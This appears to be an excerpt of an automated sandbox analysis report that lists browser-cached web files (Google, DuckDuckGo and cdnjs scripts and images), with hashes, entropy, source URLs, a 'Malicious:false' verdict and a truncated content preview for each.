                                                                                                                                                            SHA-256:193D444FA4755766E77DCE6BBB2DC35EFF82C2BFB811A6BB25FE15F95B25A7E0
                                                                                                                                                            SHA-512:25CF5DA9CC610316B8B01D1977FF84E30C98E416863F8D8005E41DF01E4CDEF09F3F7170FD356BAAFBDC347CC98DF52AC22E053C646C575C938299F84C296F67
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-chrome-webstore/_/js/k=boq-chrome-webstore.ChromeWebStoreConsumerFeUi.en_US.yIPKtUt8CNQ.es5.O/am=SAcGA2YB/d=1/excm=_b,_tp,itemdetailview/ed=1/dg=0/wt=2/ujg=1/rs=AEP720I_Mtdj4s6sZgQHnCIqaAHQcoGrAg/m=_b,_tp"
                                                                                                                                                            Preview:"use strict";this.default_ChromeWebStoreConsumerFeUi=this.default_ChromeWebStoreConsumerFeUi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x3060748, 0x598, ]);./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/.var ka,aaa,baa,Ka,Xa,kb,tb,eaa,Eb,Jb,Kb,Lb,Mb,Nb,Ob,Pb,Sb,faa,gaa,Ub,Wb,cc,fc,hc,haa,mc,nc,oc,vc,jaa,zc,maa,paa,Ac,oaa,naa,laa,kaa,Bc,Fc,Gc,Nc,Pc,Kc,Tc,Uc,Wc,taa,jd,gd,uaa,vaa,ud,td,waa,xd,xaa,zd,yaa,Bd,zaa,Hd,Gd,Aaa,Id,Ld,Rd,Sd,Vd,ae,be,pe,qe,se,$d,de,Se,Qe,Te,A,Xe,$e,df,lf,qf,Faa,Gaa,Haa,Iaa,Jaa,Kaa,Laa,Maa,Naa,Oaa,Paa,Qaa,Raa,Saa,pg,Vaa,wg,Ag,aba,Zaa,Mg,eba,Og,Rg,gba,hba,Tg,gh,lba,mba,lh,mh,nba,oba,pba,qba,Ch,rba,sba,
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):100116
                                                                                                                                                            Entropy (8bit):5.296065269890977
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:AFsyJY3w2MAgiToj42tMmqpnpq/88r7tcdXLB:AYUMmqpwkdN
                                                                                                                                                            MD5:2B5E9A4ED433EAD00B5C0D44BF9B84D3
                                                                                                                                                            SHA1:13E089842A3CE534E23092086B57FF5FB67C4002
                                                                                                                                                            SHA-256:5BF0A9485DCCD6C4F25AF2D68A9959F19E48C550FE38B5587BAB6823FE5FED53
                                                                                                                                                            SHA-512:15D81F18375B38A17495C8713E5C6071B59CC1F4B26C3555010F40BC7FBC52C84EB7D76F168ECAFB95F2603FAF980549A8EAF7808B73CAF6223EB0BB9531E3AA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[40179],{70227:function(e,t,r){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.addBasePath=function(e,t){0;return a.normalizePathTrailingSlash(n.addPathPrefix(e,""))};var n=r(89782),a=r(24969);("function"===typeof t.default||"object"===typeof t.default&&null!==t.default)&&"undefined"===typeof t.default.__esModule&&(Object.defineProperty(t.default,"__esModule",{value:!0}),Object.assign(t.default,t),e.exports=t.default)},57995:function(e,t,r){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.addLocale=void 0;r(24969);t.addLocale=function(e){return e},("function"===typeof t.default||"object"===typeof t.default&&null!==t.default)&&"undefined"===typeof t.default.__esModule&&(Object.defineProperty(t.default,"__esModule",{value:!0}),Object.assign(t.default,t),e.exports=t.default)},57565:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.detectDomainLocale=void 0;t.detectDomainLocal
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):11271
                                                                                                                                                            Entropy (8bit):7.9694874537370755
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:JnqqkGv/ErYr5fTd9SsmCPefuipzLa1FyBA+PeUAtna2SKAjA2gYm+IXet0K:J5kGEUrxXz+BamGqepEjZJm+AK
                                                                                                                                                            MD5:E091111B365226756591F79E57EC6789
                                                                                                                                                            SHA1:5FD793C51295D24DEF9CFA5859F904BF145BFA51
                                                                                                                                                            SHA-256:F4921F3DD41C29AE505C934465F47FA31EEB4F2628696782A0C5B5EED83CF0EC
                                                                                                                                                            SHA-512:565BE5889441319B5971A455EB5282E5B432DAA208AA7F76744C01FC856005CE902FD0859B5D0361E79CACC91EA420BC51F8F59667A5653D1E5C61F2BD6A3172
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR..............>a.....pHYs...%...%.IR$.....sRGB.........gAMA......a...+.IDATx..}..]e....!...c$$.)D .(A.$.r....m......k...Z==k.LH...G..]8.8*=>..q......b..b.<L!...G..y...?..?.^.V.R..!u.y...{........2+.2+.2+.2+.2+.2+.2+...E.^..m....=......x*U0D5...]..#. !..Q..7u..4..G....#.4....cF...."....$..<f...D.6)..&.m).2.Bd.0..?&..b^.v..............\.Z.x..ek../".u..uV_....5..A.. ......1I....pX......G'B.U..=....k.f.........P...V...rT.3..q...=...m...D..S.!.|.....S.u..hB.......m..]+.]..To...yzF..........[P....4..o...........m...r............X...w..o.{...W4...!....a.|.._rr/.#....~p..P......g.BW].Z7$...5.,.A.q.......4a;x#A.%3.. .F.."....z.&.U..&kF..4..e...C.2.'76.d..`...Sr.5...... #..#.Z.0$p...uGa.P.7....z..I.aF.@$w..A..L..}\- .T.....E..J...."]4..g.....&<..!.5%....g.L0.#n...X......!......9..mf.H{`...?.....LA.i_..W..09{]kdq.\....|d&..#f...!x}.k..?..coz.5!.].M.7..}.9.|j."RX..m..).K.sXhQry.op.._\.kn...O....# G....^.J....C..m:..q.....{.q.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 711 x 1123, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):47334
                                                                                                                                                            Entropy (8bit):7.95953901563727
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:5DHdjGRb7JcXY+bu9/qnAvyO4NJKWDLK7FFyb3WgA6elNUUMw2oBLjGmfKUuI:BdjGRbQdGSCyO4NJvDLo03WseDUdgCR4
                                                                                                                                                            MD5:BE16F2C911BFBF8690C7186E7E831444
                                                                                                                                                            SHA1:973C99C53B549AC4C5A0AD95D1AB00B91B517F80
                                                                                                                                                            SHA-256:45D5A5F4DC731206EBE200ACF3C5583D11424E16D792101E463743ED18A485EA
                                                                                                                                                            SHA-512:6F025D6FEA6022C496FA7DDA3D80A1A25D06DCD3DB71327DA4CCAE6CA0287CFC361620C9C43A757CCED5609838B6C951DEC60DE64FB1CF65DE75413441251D62
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR.......c......uy.....PLTE..."""............]]]............................................................III..................ggg...@@@........................................."""............9i...%!..>>>YYY..........w..........uuu.............C5000.........4.S...B................?.~ggg...LLL..........ttt@@@......8h........k....R|.8f..........Es....KKK.........7e.1Z........3............w..^....A....L\..........=N0.....=. .kt6c..x....9../..3\...@K.0 .(.....4`.......``` |......h..t.`.[NQ.....................e...qC......#..........W .Y.@......Zif.P.........}..%.....|..p......Y.@...g.....Lp.......g............i.....N.i...K......i..Dp.?f..ppp..I..>.........Z.tA.Y.R/X5.\..c0.sss.g[.KC..1......p..O.z.....oooM.iQ.G.}..`....Xz.........i&.........3tRNS...........%.*". (:=6D.3A-1.B.4.P.C!.....i.\...]%....qIDATx............................................f..v..a(.c....Z...i.S....'..}...U.K..!n\.$I.$I.$I...S...h7....rDG.Vo.u...]....E
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (11716), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):11716
                                                                                                                                                            Entropy (8bit):5.592366719580576
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:gnt5cC1Tr7inSFUIoAuDKUdpECe4QjZsktaltyFRXRFp10ZAkL8yJtW3RyGUhDey:gnTLTrvRnuDKUdpw4t3ybXRFp1KhfW3g
                                                                                                                                                            MD5:31A9DEDD8C4F18AAE38E3B891CE04C88
                                                                                                                                                            SHA1:379732A1A9CCADA7B3DCA2EC2631002486995D13
                                                                                                                                                            SHA-256:0E925DB7E2F81BE27A3EFF41A0D7A4E57976054346DF95025152F2C68BB3B4D4
                                                                                                                                                            SHA-512:D4870D5041BAF03E3B4AEE66F2C17C1704DCE5A9EF70EDD45E3ABAF90090A7E153D8BDA0FDFF863B822376E5B02CC2B241808F91B0CA9B9C5412ABC5FB9F1B1A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/84969-105bdf767c46f2b6.js
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[84969],{90914:function(e,a,o){"use strict";o.d(a,{Z:function(){return k}});var n,i=o(59499),r=o(67294),t=o(94184),s=o.n(t),c=o(85194),l=o(80912),m=o(18999);function _(){return _=Object.assign?Object.assign.bind():function(e){for(var a=1;a<arguments.length;a++){var o=arguments[a];for(var n in o)Object.prototype.hasOwnProperty.call(o,n)&&(e[n]=o[n])}return e},_.apply(this,arguments)}var p=function(e){return r.createElement("svg",_({fill:"none",viewBox:"0 0 64 64",xmlns:"http://www.w3.org/2000/svg"},e),n||(n=r.createElement("path",{fill:"currentColor",d:"M42.792 14.25c.417 0 1.063.05 1.938.15.894.08 1.908.298 3.04.656 1.133.357 2.286.934 3.459 1.729s2.256 1.908 3.25 3.339c-.1.06-.477.328-1.133.805-.636.477-1.362 1.172-2.177 2.087-.815.894-1.53 2.037-2.146 3.428-.597 1.372-.895 3.011-.895 4.92 0 2.186.378 4.034 1.133 5.544.775 1.511 1.67 2.733 2.683 3.667 1.034.935 1.948 1.62 2.743 2.058.815.417 1.252.636 1.312.655-.02.08-.169.527-.4
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):48316
                                                                                                                                                            Entropy (8bit):5.6346993394709
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                            MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):5600
                                                                                                                                                            Entropy (8bit):7.953837988383385
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:tyz6k1jTZuwJV5iVpY5XeiMgVG4vfvOf38efSPhZdLfPH8vVwlJ:tE6gjQmMmMgDG/86S5XncvVM
                                                                                                                                                            MD5:166E72742E4D97B3076EA0C17F8C8D7A
                                                                                                                                                            SHA1:6E486C170CEEB217108C2A45DDD1BA7122FA6188
                                                                                                                                                            SHA-256:8093FF66BB2D9FFCFB4715DD150151FF1DBEE9A1F218D0C3B43FF8B53592782D
                                                                                                                                                            SHA-512:79E67C3B48CBD3944FA7274BBB16670B0AC12524E852C487EA5EC57FE526740ED98B823843F90D7813827009C0799B8EEBBE3A4BBE36C6843F889787CB5AD501
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/lvi-lnjW93fptfOOExbgCulkDpRkTAVfjR3M0IKtDQv4B-sk4O9xrp2P1udQTjxsfl-gJS7S8yqv8dXxB3wITacDSaU=s60
                                                                                                                                                            Preview:.PNG........IHDR...<...<.....:..r....sBIT....|.d.....IDATh...y|U....w.MnF.H.!L.2...h.;..(..j..O[[.i}........:..'..S%..J..`.:.bR..DIBH.r3..;.s.~...@.v}>'...=...k..Z.#.7..eg...^..q.0.........X.h...{.l..M.....v..z.O...e.Jq...X....N...I...2.V....@..n"t.hz.Z[..J.v...................A..l...<.q.1.a....s.....d..#..>....i...:.>.#. ....'...Iu.D..V....,.I.b..i..n'........sF..uauEH..B.n#.7...C...n.....}.du>)..K...`.p)....1.s.\r....../._.NcwEP...3.S..<^.`6..~U..Vb..I.._`7...7.4.`..X>u]...>j..K..C.'....D.;...>B.j!......N........]....Q.VT....G..#.*..K...o....+...T*I....Xu'2......$pSeM..m..V....'.S....V........L|.v".z...P]......B7A..9....@9(..t'$. B......K..{L..&..Y"..V6.t.(..\W..O.p.....6.sTw3zn9%+...?..L...h_....w.....#..H.eEQ.}..s...C.,<...tK#.....D7"P..U){.u..5=,...s..c7J...:.....o....@.~.GW~.k.?.y....6...,..q,dx;.+.s...&Nu.+...&..JD...h...'.l..4......f|.R..........^.....D....3..t.J).R.adG#....+D.K@.0.X...e...=I.U7..n...:W...vr....L..1T.J
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:MS Windows icon resource - 2 icons, 16x16 with PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, 32x32 with PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2799
                                                                                                                                                            Entropy (8bit):7.887078814855564
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:p7gHKtGThWJwwehUaFvJcldUlpamPj1YMCMrpyiXQy+OvlwnoSdRIfUAYu1dxx3v:1aRhWJPeOev+deMmPj1PIkSpdyUFFvjq
                                                                                                                                                            MD5:0A362A1A0CF4CC6BC56D65DB8049DD6F
                                                                                                                                                            SHA1:EBFD1B824377525E1588719E935BF4B06349CDDF
                                                                                                                                                            SHA-256:D994F806B1E4225B50BE5AB681B2CECF845CC216A19A432D878CEA3CB815BAFD
                                                                                                                                                            SHA-512:9BC3349815F97884A92965F5936A7ABC4EE937232F305148BD6D791DE0D0199C51C5A314E6F4F5EFBCAC925A860C8DA4DA6E94472471F36DB7725CAF4B49AC8B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:............ .y...&... .... .P........PNG........IHDR................a...@IDAT8...ML[.....}.......3l#+U.q.........>:......'O.:...bv0.0.K..ds&l.J....J.`......B..}}...f.............M..9..)*G=..g.r.SR.k..s....W................@....a..'.l..*c..b...z.....h[.q.S...s...6GF...J.]T.3._....D....z...)X.c....L......xo..U...j.x/jK..#.X.Y6}p..3..........X#.z....?>.l...V.....%......B..A.....=.N..4.X.BA2}..[.5._ .N.....n....cd..~+.k.=.ey....g..Z#.+.J....... .B{.qI.h&.......B..0..N&g"...,Sj.....5.R..g...DI.]U.K.V..%_.+.E.k..#..C....b.`S......]R....E..-.mA.(...:.wg3VA.8y.h.A0.`.On....!.(.&\.P..\..`f%W4..X..M..pV.X.~..!.v.p?x.h....pVu...B.lg*.U.Qq.o.......0...b.H..T.C.#..u..E.q.H.. .......33.,?.\0..a..Tw..3.O..._..J....YNf..u.m......X..6...\}.\q..x.......J.L...o.e..T...v....N.G.A.......'....7.p$.*h5.U...:_.......-..S...(.......m...[......N..]q..n......x.O..c.5.....V...o.=g._hW.....IEND.B`..PNG........IHDR... ... .....szz.....IDATX..._lS...?...?...!sYBYl..N.[..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):13229
                                                                                                                                                            Entropy (8bit):7.968329338879
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:jt/yLNZOkl66GdJPtvWHRw+97q3pVd+vajTctV5AxEKyWf62UjS0j6eOerReT:BKZGVRtvKqZVHPeXIH/0HOP
                                                                                                                                                            MD5:EC00DFDEAD7B4EBAEDFE9899EA5905D1
                                                                                                                                                            SHA1:FF6B6C17A52B89578FE16E4AFF4989A4FDA860D3
                                                                                                                                                            SHA-256:3123DE188014A841F794FCE944662C3C1DD4D71CCCBC72459E2B9148933B0DAC
                                                                                                                                                            SHA-512:68FFD7E34777612FA6B2E9B4F9E78EAC28A8F5996DA34B87663AED92A767718A1EA9892A55242C8797BF125A10A648CD68D3447D219E1DE1834EB71C95416816
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR..............>a.....pHYs...%...%.IR$.....sRGB.........gAMA......a...3BIDATx..}..^.U..}...#..e....V..O.....1YBp.DN`..*,....[.a...-..,..Z.. .... !....y..I.I*...8~.K#[.cY.F.....{...~....%...2........>..X.UY.UY.UY.UY.UY.UY..F..*.-.l...r.*uF..d7.C.X...sn...V...;...Le...!.....`..>2bN.c...4.*..9M..Z.Q..x0l....2.U..PH.#P.A(5..T..o.b....}7.3Y..;.V.....R4...?..&...ON.2.U.x...'?.....6..o.P....d...#....{.|.p.Z<"#...0...N\&.....Y.....*d`HE....s.m#..d..K.9};5...^.j...4.\..`..uy... ...g.M....v.....@...Af..Gm..=X......G.F.....F....V*W0j@H.!...C]...Be...eM..R\l..~=....i..r..^....V. ..(s...-...&.tZe..,..2f..L....&..d..R).l~..7.r..aj.....-..=..+PV..b........T.+..@..'.......{l7O.u.V.....s.....[x#lC..~[......5.P.{.QW}f.V..2..y..v.l..x.S.|.........;..._`.@.g.|.v..yY.`....2..".}gP..)..);....C (.P... (..\.(V.... ....x.~....;.. ....m.~..U."..n....p...c.Y....(SXU.WB..%...od..s.....#..V.......|.....`T5v...+..H.(........#.......W....J.V..........4..k...K@
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (974), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):974
                                                                                                                                                            Entropy (8bit):5.262662795433932
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:+dbjJ3SfgEdIuWe0Vrw4sVhbPEAEoKASjfa+AoXA5A++rm+sTAdb+sS0f+sjf+sT:ibjlAdIZ9wVNEnXvjVxbqEqxPdEJR
                                                                                                                                                            MD5:28B266E9ADD6DDDFF88394BF47B32A87
                                                                                                                                                            SHA1:8E004C3ED876459A25D74FB13B44A394650B25E5
                                                                                                                                                            SHA-256:F558A71010B7B51B429A07A9B064B80143007052FB97E3A3B5E09B9AADE37638
                                                                                                                                                            SHA-512:48F1D5BDD9EADD6D1308E2B8261EB1996BF01DA6443A26B5934A2DF57C8E023CE7A48C7FECCE97BE8C48DEE9C022BA20DACE39DBFDF114EEB7B375A85FFB1915
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[78597],{64009:function(o,i,n){n.r(i),n.d(i,{default:function(){return d}});var s=n(45697),l=n.n(s),e=n(14085);function d(o){var i=o.mobileOnly,n=void 0!==i&&i,s=o.desktopOnly,l=void 0!==s&&s,d=o.iosOnly,t=void 0!==d&&d,a=o.androidOnly,c=void 0!==a&&a,r=o.macOnly,v=void 0!==r&&r,O=o.windowsOnly,b=void 0!==O&&O,p=o.notMac,u=void 0!==p&&p,y=o.notWindows,k=void 0!==y&&y,w=o.notSafari,f=void 0!==w&&w,D=o.notIPadOS,M=void 0!==D&&D,S=o.children,h=(0,e.Z)();return h?f&&h.isSafari?null:t&&h.isMobileDevice&&h.isIos||c&&h.isMobileDevice&&h.isAndroid||n&&h.isMobileDevice||l&&h.isDesktop||v&&h.isDesktop&&h.isMacOS||b&&h.isDesktop&&h.isWindows?S:(!u||!1!==h.isDesktop&&!1!==h.isMacOS)&&(!k||!1!==h.isDesktop&&!1!==h.isWindows)?M&&!1===h.isIPadOS?S:null:S:null}d.propTypes={mobileOnly:l().bool,desktopOnly:l().bool,macOnly:l().bool,windowsOnly:l().bool,notMac:l().bool,notWindows:l().bool,children:l().any}}}]);
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (340), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):340
                                                                                                                                                            Entropy (8bit):5.402081775975914
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:XzjbdHhjbzrgNugDU8FxkvV+3rWGY41Y5GQBDMiLmpgFVU9j9QGJvgETBRXyYd1L:fbjuugDU8FxAU711cDtmaUPvgETBRXyA
                                                                                                                                                            MD5:FA64B877DDFDF799013414C2ADDE1374
                                                                                                                                                            SHA1:5C5655170881C66984A68BA4F3372402FFBA78FD
                                                                                                                                                            SHA-256:6D154E7F1FD96A35A09D70198A8AFF29FB06F6A8824237382984C0B374ECA4DC
                                                                                                                                                            SHA-512:9ACCC57A0577B1F968EEEDD4192340F001CCE331D3845AD6A16639510DF1B2F8457FF28940163CF0D38B6E347EFEEFBEACC2369A3CC71A9D796EF0BCF41FBCEF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[328],{89663:function(n,_,u){(window.__NEXT_P=window.__NEXT_P||[]).push(["/[locale]/windows",function(){return u(79567)}])}},function(n){n.O(0,[41966,43965,49224,81125,67191,62242,49706,66556,79567,49774,92888,40179],(function(){return _=89663,n(n.s=_);var _}));var _=n.O();_N_E=_}]);
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):2769
                                                                                                                                                            Entropy (8bit):7.9016613239114175
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:WGO9Jq9EFXLt41jUSya3uJ0WVGifErCr3GIIPmbA1ER7HYWRVhANSkIvHe6DKo29:O98OFXBwyKe0WVGawLED3KNGHE9
                                                                                                                                                            MD5:B93CB32AA29E53489F1615E1BFF5BB42
                                                                                                                                                            SHA1:3B858858B7B34FE56664EEB6FB2F3D200AE5A3AE
                                                                                                                                                            SHA-256:3BD380B6D4B042F3BDEC48E27612B03B72A51847568162A8CC02E31D0BDE80C9
                                                                                                                                                            SHA-512:7AB5B97C76E5827E1A2CD906D4EFC399BADEFCD8B13C42B18EC7885B830100C5367640C96915D44679D22A13DC60C17BF936CEA8B8254E8BCD2E4238E959DB0F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/media/macos.61889438.png
                                                                                                                                                            Preview:.PNG........IHDR..............>a.....pHYs...%...%.IR$.....sRGB.........gAMA......a....fIDATx..KV.8...~.zV..p..X..Y...Z.. .Q.C. ....{.X....V...Z....#9.-...{..?..tu.0..D".H$..D".H.P....HH".ts<.....G.k^+...,.i...#d,.@e^.9..b.x.<m.A.=...T.D......m....K:...?..i.1$.X'..........d..Q+d.4........!X$EXU}.CH......P..U..%...&.A....J.Nf.J....Y.u...K!/.KA>.y2....a)...`......`...0..c$...!..8..@..........C...c..28.. ...%SC.K...1..R^0..!..9....%....`......k..?.....!.R4.I1......a.)....y..0.. AX.f.......Kx"MS..s\\\l?.y.....s.$.y<.f3.o*.,......3..qtt..d..rY\.#.W...L...<Z.P...J*."....3.yyy)...(.F..~Ba.{.<~.../.g'..F>...|.7....}...L$....~.B.....M............LD..w>.'..j4R.......[...<)I..d..OJ..*.".....P.oT...W..F.c..46U.d.Q5..........(.;......j...;"...o...".X.?|...]T....o..}...M.<.\.Y.!m...M..@g....+.....8Jc.r.......X.[`L.^..F...|...?.....Jy.4......F..ai.M....N......3. .:@.jzA....#@..T...>>>....i.E....FQ..g...|....d.0..T...bQ..<.j.4(.(._.N....M. .H.?*....g.Z..,
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1885)
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):126135
                                                                                                                                                            Entropy (8bit):5.498654960721984
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:AkyvF6US20FCdrgVr3dfPeIofdhIUsTx0wVnX9Mb:AkygUS29rWPeIofdCVnX9Mb
                                                                                                                                                            MD5:C299A572DF117831926BC3A0A25BA255
                                                                                                                                                            SHA1:673F2AC4C7A41AB95FB14E2687666E81BC731E95
                                                                                                                                                            SHA-256:F847294692483E4B7666C0F98CBE2BD03B86AE27B721CAE332FEB26223DDE9FC
                                                                                                                                                            SHA-512:B418A87A350DBC0DEF9FAF3BE4B910CB21AE6FFFC6749EECEA486E3EB603F5AF92F70B936C3D440009482EDE572EE9736422CF89DCDD2B758DFA829216049179
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.7LPvRDgzcqA.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo9wdgl3D0Cd5pn6O1gZXHwWDc_oTg/cb=gapi.loaded_0"
                                                                                                                                                            Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x800000, ]);.var ba,fa,ha,na,oa,sa,ua,wa;ba=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};fa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.ma=ha(this);na=function(a,b){if(b)a:{var c=_.ma;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&fa(c,a,{configurable:!0,writable:!0,value:b})}};.na("Symbol",function(a){if(a)r
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):1937
                                                                                                                                                            Entropy (8bit):4.940379550034767
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:TMClHa9kW9YPGZ4vry8ncK3Q7q/WTM0xvV2brUEzf7nv4ezLgQH5:gClMkVvrAVq/WTP2bgEHnvt3Z
                                                                                                                                                            MD5:50C83D629F91A82D32C106BFE79084F3
                                                                                                                                                            SHA1:8AB2212C4AE249DB2E80E689719FFBEBACA63547
